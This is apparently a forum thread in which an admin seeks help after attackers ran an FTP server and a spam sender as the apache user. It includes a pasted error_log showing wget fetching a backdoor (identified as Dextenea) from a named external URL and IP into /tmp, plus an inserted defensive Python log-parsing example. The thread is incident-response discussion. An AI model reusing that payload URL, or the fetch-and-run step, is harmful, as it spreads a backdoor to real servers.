Apache security problems

ircman

We found some strange scripts running under the apache user.
One was an FTP server and one was a spam sender.
So there is a problem somewhere in my Apache that lets scripts be executed under the apache user.

But I have no idea where to look or how to fix this.

Can someone help me with this?

Kind regards,
 
ircman said:
We found some strange scripts running under the apache user.
One was an FTP server and one was a spam sender.
So there is a problem somewhere in my Apache that lets scripts be executed under the apache user.

But I have no idea where to look or how to fix this.

Can someone help me with this?

Kind regards,

If it runs as the user apache, then there's probably a PHP script that has an exploit.
 
Hmm.. I have searched all the log files but I cannot detect anything.
They uploaded some scripts and they could execute them as the apache user.
What is the best possible way to secure this ASAP?
 
The only thing we found was in our /var/log/httpd/error_log:


--12:46:38-- http://www.move2wigan.com/images/img/tt.txt
=> `tt.txt'
Resolving www.move2wigan.com... 217.199.184.98
Connecting to www.move2wigan.com[217.199.184.98]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,448 [text/plain]

0K .......... ........ 100% 288.57 KB/s

12:46:39 (288.57 KB/s) - `tt.txt' saved [19448/19448]


After this the file tt.txt was in the folder /tmp and somehow it was executed. With this program somebody was able to connect with ssh as user apache.

Does somebody know how he could download and execute this file?
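
Added example, not part of the original post: wget writes its transcript to stderr, which a process started by an httpd child inherits, so a transcript like the one above sitting in error_log means wget was launched from the web server. The Python sketch below pulls such transcripts out of an error_log and attaches the last Apache timestamp before each one (wget logs only the time of day) so it can be matched against access_log; the sample log, host name and IP addresses are constructed.

```python
import re

# Apache error_log prefix, e.g. "[Mon Nov 01 12:46:30 2004] [error] ..."
APACHE_LINE = re.compile(r"^\[(?P<stamp>\w{3} \w{3} [ \d]\d [\d:]{8} \d{4})\] \[\w+\]")
# Lines of an old-style wget transcript (wget writes these to stderr)
WGET_START = re.compile(r"^--(?P<time>\d{2}:\d{2}:\d{2})--\s+(?P<url>\S+)")
WGET_RESOLVE = re.compile(r"^Resolving \S+?\.\.\. (?P<ip>[\d.]+)")
WGET_SAVED = re.compile(r"^[\d:]{8} \(.*?\) - `(?P<file>[^']+)' saved \[(?P<size>\d+)/\d+\]")

# Constructed sample log: documentation-range IPs and an .invalid host name
SAMPLE_LOG = """\
[Mon Nov 01 12:46:30 2004] [error] [client 192.0.2.55] File does not exist: /var/www/html/favicon.ico
--12:46:38--  http://files.example.invalid/img/tt.txt
           => `tt.txt'
Resolving files.example.invalid... 192.0.2.10
Connecting to files.example.invalid[192.0.2.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,448 [text/plain]
12:46:39 (288.57 KB/s) - `tt.txt' saved [19448/19448]
[Mon Nov 01 12:47:02 2004] [notice] child pid 4242 exit signal Segmentation fault (11)
""".splitlines()

def find_downloads(lines):
    """Return one dict per wget transcript embedded in an Apache error_log."""
    events, current, last_stamp = [], None, None
    for line in lines:
        if (m := APACHE_LINE.match(line)):
            last_stamp = m.group("stamp")  # gives the date wget's output lacks
        elif (m := WGET_START.match(line)):
            current = {"url": m.group("url"), "time": m.group("time"),
                       "after_apache_entry": last_stamp,
                       "ip": None, "file": None, "size": None}
            events.append(current)
        elif current and (m := WGET_RESOLVE.match(line)):
            current["ip"] = m.group("ip")
        elif current and (m := WGET_SAVED.match(line)):
            current["file"], current["size"] = m.group("file"), int(m.group("size"))
            current = None  # transcript complete
    return events

if __name__ == "__main__":
    for event in find_downloads(SAMPLE_LOG):
        print(event)
```

An event whose "file" is still None is a transcript that never reached the "saved" line, i.e. a download that was started but not completed.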
 
The file is a backdoor virus, called Dextenea....


From the Symantec site:

Backdoor.Dextenea is a Linux-based Trojan horse that attempts to open a back door and uses various malicious programs to conceal its presence.


Do you have chkrootkit or rkhunter installed?
 
We installed rkhunter and it showed no installed rootkits. We updated openssl and php because there was a newer version, but after that it happened again.

I'll try chkrootkit now to see if that prog can find something.
 